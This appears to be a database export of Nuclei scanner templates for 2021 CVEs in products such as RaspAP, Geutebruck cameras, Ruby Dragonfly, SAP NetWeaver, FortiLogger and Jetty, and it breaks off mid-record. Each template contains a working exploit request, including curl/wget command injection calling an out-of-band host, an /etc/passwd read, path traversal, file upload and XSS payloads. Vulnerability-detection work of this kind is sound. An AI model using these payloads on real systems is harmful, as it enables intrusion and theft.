"CVE-2021-33221.yaml", "content": "id: CVE-2021-33221\n\ninfo:\n name: CommScope Ruckus IoT Controller - Information Disclosure\n author: geeknik\n severity: critical\n description: CommScope Ruckus IoT Controller is susceptible to information disclosure vulnerabilities because a 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens).\n impact: |\n Successful exploitation of this vulnerability could result in the exposure of sensitive data, potentially leading to further attacks or unauthorized access.\n remediation: |\n Apply the latest security patches or updates provided by CommScope to mitigate the information disclosure vulnerability (CVE-2021-33221).\n reference:\n - https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf\n - http://seclists.org/fulldisclosure/2021/May/72\n - https://korelogic.com/advisories.html\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33221\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-33221\n cwe-id: CWE-306\n epss-score: 0.23566\n epss-percentile: 0.96154\n cpe: cpe:2.3:a:commscope:ruckus_iot_controller:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: commscope\n product: ruckus_iot_controller\n tags: cve2021,cve,commscope,ruckus,debug,service,leak,seclists\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/service/v1/service-details\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: word\n words:\n - \"message\"\n - \"ok\"\n - \"data\"\n - \"dns\"\n - \"gateway\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022040d9f901c377c371535d5eba601ba2641df74547f351de738a7d9b290daf6b90022042c17f7955d7e8c548d6ad429ee8db2ad8bfca849b19d888de7d37efc4a14b75:922c64590222798bb761d5b6d8e72950", "hash": "c09f94bc897845fac4c086ae92bd3a35", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308363" }, "name": "CVE-2021-33357.yaml", "content": "id: CVE-2021-33357\n\ninfo:\n name: RaspAP <=2.6.5 - Remote Command Injection\n author: pikpikcu,pdteam\n severity: critical\n description: |\n RaspAP 2.6 to 2.6.5 allows unauthenticated attackers to execute arbitrary OS commands via the \"iface\" GET parameter in /ajax/networking/get_netcfg.php, when the \"iface\" parameter value contains special characters such as \";\".\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the integrity and confidentiality of the affected system.\n remediation: |\n Upgrade RaspAP to a version higher than 2.6.5 to mitigate the vulnerability.\n reference:\n - https://checkmarx.com/blog/chained-raspap-vulnerabilities-grant-root-level-access/\n - https://gist.github.com/omriinbar/52c000c02a6992c6ce68d531195f69cf\n - https://github.com/RaspAP/raspap-webgui\n - https://nvd.nist.gov/vuln/detail/CVE-2021-33357\n - https://github.com/20142995/Goby\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-33357\n cwe-id: CWE-78\n epss-score: 0.96502\n epss-percentile: 0.99569\n cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: raspap\n product: raspap\n tags: cve2021,cve,rce,raspap,oast\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n words:\n - \"DHCPEnabled\"\n\n extractors:\n - type: regex\n group: 1\n regex:\n - 'GET \\/([a-z-]+) HTTP'\n part: interactsh_request\n# digest: 4b0a00483046022100a36fdff828bec618e9c78788bae9076907c04531b09578a93abe65de10f97b25022100a506a1278139dae39fbaa6f9678143001d0560355b56762dfce83af689ef65f9:922c64590222798bb761d5b6d8e72950", "hash": "3fa99a9cf78ba6cbbb4aec9e4a2b001c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308364" }, "name": "CVE-2021-33544.yaml", "content": "id: CVE-2021-33544\n\ninfo:\n name: Geutebruck - Remote Command Injection\n author: gy741\n severity: high\n description: Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device, leading to unauthorized access, data theft, or further compromise of the network.\n remediation: |\n Apply the latest security patches or firmware updates provided by Geutebruck to mitigate the vulnerability.\n reference:\n - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\n - https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/\n - https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\n - https://nvd.nist.gov/vuln/detail/CVE-2021-33544\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2021-33544\n cwe-id: CWE-78\n epss-score: 0.9753\n epss-percentile: 0.99991\n cpe: cpe:2.3:h:geutebrueck:g-cam_ebc-2110:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: geutebrueck\n product: g-cam_ebc-2110\n tags: cve2021,cve,geutebruck,rce,oast,geutebrueck\n\nhttp:\n - raw:\n - |\n GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1\n Host: {{Hostname}}\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4b0a00483046022100f37bc917cbc8b527d545f16cfed837d2affcbba4fa29c559bdf237631cfd5b0e022100d96a76e1037df09d7c06602c2e942944102c3c42fe92225ea7aa74c76e9100b9:922c64590222798bb761d5b6d8e72950", "hash": "43a2bd9509ef09f7bb83926aead259d2", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308365" }, "name": "CVE-2021-33564.yaml", "content": "id: CVE-2021-33564\n\ninfo:\n name: Ruby Dragonfly <1.4.0 - Remote Code Execution\n author: 0xsapra\n severity: critical\n description: Ruby Dragonfly before 1.4.0 contains an argument injection vulnerability that allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade Ruby Dragonfly to version 1.4.0 or later to mitigate this vulnerability.\n reference:\n - https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/\n - https://github.com/markevans/dragonfly/compare/v1.3.0...v1.4.0\n - https://github.com/markevans/dragonfly/commit/25399297bb457f7fcf8e3f91e85945b255b111b5\n - https://github.com/mlr0p/CVE-2021-33564\n - https://nvd.nist.gov/vuln/detail/CVE-2021-33564\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-33564\n cwe-id: CWE-88\n epss-score: 0.07547\n epss-percentile: 0.93983\n cpe: cpe:2.3:a:dragonfly_project:dragonfly:*:*:*:*:*:ruby:*:*\n metadata:\n max-request: 2\n vendor: dragonfly_project\n product: dragonfly\n framework: ruby\n tags: cve2021,cve,rce,ruby,injection,dragonfly_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==\"\n - \"{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220767731dd7d7a2c3704e8f37718260e27d179b1fcdee83f7a23fae684f8521a29022100dd6fabe448035967b1ffc254f7bff91f427de7816c3a09d2f32288da56f8e877:922c64590222798bb761d5b6d8e72950", "hash": "d414b8dc4838151c433a47335b544b56", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308366" }, "name": "CVE-2021-33690.yaml", "content": "id: CVE-2021-33690\n\ninfo:\n name: SAP NetWeaver Development Infrastructure - Server Side Request Forgery\n author: DhiyaneshDK\n severity: critical\n description: |\n Server-Side Request Forgery (SSRF) vulnerability has been detected in the SAP NetWeaver Development Infrastructure Component Build Service versions - 7.11, 7.20, 7.30, 7.31, 7.40, 7.50The SAP NetWeaver Development Infrastructure Component Build Service allows a threat actor who has access to the server to perform proxy attacks on server by sending crafted queries. Due to this, the threat actor could completely compromise sensitive data residing on the Server and impact its availability.Note: The impact of this vulnerability depends on whether SAP NetWeaver Development Infrastructure (NWDI) runs on the intranet or internet. The CVSS score reflects the impact considering the worst-case scenario that it runs on the internet.\n remediation: Apply the latest firmware update provided by the vendor to mitigate this vulnerability.\n reference:\n - https://redrays.io/cve-2021-33690-server-side-request-forgery-vulnerability/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-33690\n - https://launchpad.support.sap.com/#/notes/3072955\n - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=582222806\n - https://github.com/redrays-io/CVE-2021-33690\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 9.9\n cve-id: CVE-2021-33690\n cwe-id: CWE-918\n epss-score: 0.3856\n epss-percentile: 0.97133\n cpe: cpe:2.3:a:sap:netweaver_development_infrastructure:7.11:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: sap\n product: netweaver_development_infrastructure\n shodan-query: html:\"SAP NetWeaver\"\n tags: cve2021,cve,oast,ssrf,sap\n\nhttp:\n - raw:\n - |\n POST /tc.CBS.Appl/tcspseudo HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n CBS=http://{{interactsh-url}}&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - \"Could not connect to the CBS\"\n# digest: 490a00463044022027727d913e7044670a5cfc2a318a45aac111b189bee52347b9a90933cf5c801b022011d1873dee71de17c4f6b36800ac5b17f4129ced9b5bba0e86ef087c08c08dd0:922c64590222798bb761d5b6d8e72950", "hash": "bcf757a46d8229cc9f79fa0c6e9a4c76", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308367" }, "name": "CVE-2021-3374.yaml", "content": "id: CVE-2021-3374\n\ninfo:\n name: Rstudio Shiny Server <1.5.16 - Local File Inclusion\n author: geeknik\n severity: medium\n description: Rstudio Shiny Server prior to 1.5.16 is vulnerable to local file inclusion and source code leakage. This can be exploited by appending an encoded slash to the URL.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially exposing sensitive information.\n remediation: |\n Upgrade Rstudio Shiny Server to version 1.5.16 or later to mitigate the vulnerability.\n reference:\n - https://github.com/colemanjp/shinyserver-directory-traversal-source-code-leak\n - https://blog.rstudio.com/2021/01/13/shiny-server-1-5-16-update/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3374\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-3374\n cwe-id: CWE-22\n epss-score: 0.00235\n epss-percentile: 0.61534\n cpe: cpe:2.3:a:rstudio:shiny_server:*:*:*:*:pro:*:*:*\n metadata:\n max-request: 2\n vendor: rstudio\n product: shiny_server\n tags: cve2021,cve,rstudio,traversal\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%2f/\"\n - \"{{BaseURL}}/sample-apps/hello/%2f/\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Index of /\"\n\n - type: regex\n part: body\n regex:\n - \"[A-Za-z].*\\\\.R\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b1c465a83bf095eaab8ef309c15df15310aa6724bc213fa50af8c7323174d4da022100efa38cb1a731ed0c095c6017209cd82a727de7f44d25f48b8efaefbbab8721a3:922c64590222798bb761d5b6d8e72950", "hash": "48e245a59c727761a79bc24e9d5fa735", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308368" }, "name": "CVE-2021-3377.yaml", "content": "id: CVE-2021-3377\n\ninfo:\n name: npm ansi_up v4 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: npm package ansi_up v4 is vulnerable to cross-site scripting because ANSI escape codes can be used to create HTML hyperlinks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a user's browser, leading to potential data theft or unauthorized actions.\n remediation: Upgrade to v5.0.0 or later.\n reference:\n - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf\n - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3377\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-3377\n cwe-id: CWE-79\n epss-score: 0.00129\n epss-percentile: 0.46774\n cpe: cpe:2.3:a:ansi_up_project:ansi_up:*:*:*:*:*:node.js:*:*\n metadata:\n max-request: 1\n vendor: ansi_up_project\n product: ansi_up\n framework: node.js\n tags: cve2021,cve,xss,npm,ansi_up_project,node.js\n\nhttp:\n - raw:\n - |+\n GET /\\u001B]8;;https://interact.sh\"/onmouseover=\"alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1\n Host: {{Hostname}}\n Connection: close\n\n unsafe: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n words:\n - \"sh\\\"/onmouseover=\\\"alert(1)\\\">\"\n# digest: 490a0046304402200be98ecd1e9d686de76a80e1b6ba45a22113eba83e6af3420ff0a2c5f8e704cb0220421807456b96e3079452c53c16bc561a5906c0c939ece2763ade16a573e0acb6:922c64590222798bb761d5b6d8e72950", "hash": "cc44d51585f52e60fb0516ca6b3b488f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308369" }, "name": "CVE-2021-3378.yaml", "content": "id: CVE-2021-3378\n\ninfo:\n name: FortiLogger 4.4.2.2 - Arbitrary File Upload\n author: dwisiswant0\n severity: critical\n description: |\n FortiLogger 4.4.2.2 is affected by arbitrary file upload issues. Attackers can send a \"Content-Type: image/png\" header to Config/SaveUploadedHotspotLogoFile and then Assets/temp/hotspot/img/logohotspot.asp.\n impact: |\n Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, and potential compromise of the affected system.\n remediation: |\n Apply the latest security patch or upgrade to a patched version of FortiLogger to mitigate this vulnerability.\n reference:\n - https://erberkan.github.io/2021/cve-2021-3378/\n - https://github.com/erberkan/fortilogger_arbitrary_fileupload\n - http://packetstormsecurity.com/files/161601/FortiLogger-4.4.2.2-Arbitrary-File-Upload.html\n - http://packetstormsecurity.com/files/161974/FortiLogger-Arbitrary-File-Upload.html\n - https://github.com/SYRTI/POC_to_review\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-3378\n cwe-id: CWE-434\n epss-score: 0.46039\n epss-percentile: 0.97333\n cpe: cpe:2.3:a:fortilogger:fortilogger:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: fortilogger\n product: fortilogger\n tags: cve,cve2021,fortilogger,fortigate,fortinet,packetstorm,fileupload,intrusive\n\nhttp:\n - raw:\n - |\n POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\n Accept: application/json\n Referer: {{BaseURL}}\n Connection: close\n X-Requested-With: XMLHttpRequest\n\n ------WebKitFormBoundarySHHbUsfCoxlX1bpS\n Content-Disposition: form-data; name=\"file\"; filename=\"poc.txt\"\n Content-Type: image/png\n\n {{randstr}}\n\n ------WebKitFormBoundarySHHbUsfCoxlX1bpS\n - |\n GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - \"{{randstr}}\"\n\n - type: word\n part: header\n words:\n - \"text/plain\"\n - \"ASP.NET\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009ca6ec31fff128d598adf60dee1493944a7ab52755ca4f6499b9c9e753b6527d02210099391061cf59dbd9935b6a7d1a7083e8452a818b33747499e433c09616fb636e:922c64590222798bb761d5b6d8e72950", "hash": "f7cb38c54e4e12279fd7f53a977674ce", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30836a" }, "name": "CVE-2021-33807.yaml", "content": "id: CVE-2021-33807\n\ninfo:\n name: Cartadis Gespage 8.2.1 - Directory Traversal\n author: daffainfo\n severity: high\n description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and further compromise of the system.\n remediation: |\n Apply the latest security patch or update provided by the vendor to fix the directory traversal vulnerability in Cartadis Gespage 8.2.1.\n reference:\n - https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807\n - https://www.gespage.com/cartadis-db/\n - https://www.cartadis.com/gespage-website/\n - https://support.gespage.com/fr/support/solutions/articles/14000130201-security-advisory-gespage-directory-traversal\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-33807\n cwe-id: CWE-22\n epss-score: 0.02187\n epss-percentile: 0.89167\n cpe: cpe:2.3:a:gespage:gespage:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gespage\n product: gespage\n tags: cve2021,cve,lfi,gespage\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"NetpDoDomainJoin:\"\n\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210081ba553c292e57848a13e7ec65c8dec5a15b83b70c930746bfab4dbcd266287702203de6c624da037776f85ee134ccaaec236dd1bef707915e944cfe6731006bb29b:922c64590222798bb761d5b6d8e72950", "hash": "0e18e02f192da3cffe2f24aef6b8255d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30836b" }, "name": "CVE-2021-33851.yaml", "content": "id: CVE-2021-33851\n\ninfo:\n name: WordPress Customize Login Image <3.5.3 - Cross-Site Scripting\n author: 8authur\n severity: medium\n description: |\n WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts in the context of the victim's browser.\n remediation: |\n Update to the latest version of the WordPress Customize Login Image plugin (3.5.3) to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203\n - https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html\n - https://wordpress.org/plugins/customize-login-image/\n - https://nvd.nist.gov/vuln/detail/cve-2021-33851\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2021-33851\n cwe-id: CWE-79\n epss-score: 0.00069\n epss-percentile: 0.2831\n cpe: cpe:2.3:a:apasionados:customize_login_image:3.4:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: apasionados\n product: customize_login_image\n framework: wordpress\n tags: cve,cve2021,wpscan,wordpress,customize-login-image,wp,authenticated,wp-plugin,xss,apasionados\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/options.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n option_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=&cli_logo_file=&cli_login_background_color=&cli_custom_css=\n - |\n GET /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_4 == 200'\n - 'contains(header_4, \"text/html\")'\n - 'contains(body_4, \"Go to \")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\"'\n internal: true\n part: body\n# digest: 490a004630440220098b618e64216cc6e575a474182053eae704f5b3d91f98e7851d52a79480d57002207755a534f0e8813a54b102ebe3fb5b8a4f145c17ff32468ab7f25305f3536832:922c64590222798bb761d5b6d8e72950", "hash": "e9e68b2e907b49ef1af7aa3d464e5cc4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30836c" }, "name": "CVE-2021-33904.yaml", "content": "id: CVE-2021-33904\n\ninfo:\n name: Accela Civic Platform <=21.1 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via the security/hostSignon.do parameter servProvCode.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Accela Civic Platform (version >21.1) that includes proper input validation to mitigate the XSS vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/49980\n - https://gist.github.com/0xx7/3d934939d7122fe23db11bc48eda9d21\n - http://packetstormsecurity.com/files/163093/Accela-Civic-Platorm-21.1-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-33904\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-33904\n cwe-id: CWE-79\n epss-score: 0.00182\n epss-percentile: 0.54617\n cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: accela\n product: civic_platform\n tags: cve,cve2021,accela,xss,edb,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n words:\n - '\"k3woq\"^confirm(document.domain)^\"a2pbrnzx5a9\"'\n - 'servProvCode'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a95bda837d8b3972b0cfccf95320c0e041709f4cff91ea1ce8e061322f58c92e022100c14bcebdc61fb62d8cd5a7392dd3d5350a3aff7a740c0b1b270eebe6d48999ec:922c64590222798bb761d5b6d8e72950", "hash": "ed8dab66c4d946dc83f84925543e97d3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30836d" }, "name": "CVE-2021-34370.yaml", "content": "id: CVE-2021-34370\n\ninfo:\n name: Accela Civic Platform <=21.1 - Cross-Site Scripting\n author: 0x_Akoko\n severity: medium\n description: Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via ssoAdapter/logoutAction.do successURL.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade to a patched version of Accela Civic Platform (version >21.1) that includes proper input validation and sanitization.\n reference:\n - https://www.exploit-db.com/exploits/49990\n - https://www.accela.com/civic-platform/\n - https://gist.github.com/0xx7/7e9f1b725f7ff98b9239d3cb027b7dc8\n - https://nvd.nist.gov/vuln/detail/CVE-2021-34370\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-34370\n cwe-id: CWE-79\n epss-score: 0.00183\n epss-percentile: 0.55682\n cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: accela\n product: civic_platform\n tags: cve,cve2021,xss,redirect,accela,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4a0a00473045022100e1d5e0fe66e7bd88bc45de6a476cbc23b17220cde20c7b7560d133853427f82d0220014968e50c61f56d305daa49a33662330b1a2705fc3d7dd7992593fd4630945b:922c64590222798bb761d5b6d8e72950", "hash": "2256eebb87a5cfb6ee97ac0e7c7696da", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30836e" }, "name": "CVE-2021-34429.yaml", "content": "id: CVE-2021-34429\n\ninfo:\n name: Eclipse Jetty - Information Disclosure\n author: bernardofsr,am0nt31r0\n severity: medium\n description: |\n Eclipse Jetty 9.4.37-9.4.42, 10.0.1-10.0.5 and 11.0.1-11.0.5 are susceptible to improper authorization. URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to potential unauthorized access or further attacks.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Eclipse Jetty.\n reference:\n - https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm\n - https://lists.apache.org/thread.html/r763840320a80e515331cbc1e613fa93f25faf62e991974171a325c82@%3Cdev.zookeeper.apache.org%3E\n - https://lists.apache.org/thread.html/r7dd079fa0ac6f47ba1ad0af98d7d0276547b8a4e005f034fb1016951@%3Cissues.zookeeper.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2021-34429\n - https://lists.apache.org/thread.html/r029c0c6833c8bb6acb094733fd7b75029d633f47a92f1c9d14391fc0@%3Cnotifications.zookeeper.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-34429\n cwe-id: CWE-200,NVD-CWE-Other\n epss-score: 0.45704\n epss-percentile: 0.97324\n cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: eclipse\n product: jetty\n tags: cve2021,cve,jetty,eclipse\n\nhttp:\n - raw:\n - |+\n GET /%u002e/WEB-INF/web.xml HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n\n - |+\n GET /.%00/WEB-INF/web.xml HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n\n unsafe: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"java.sun.com\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/xml\"\n\n - type: status\n status:\n - 200\n# digest: 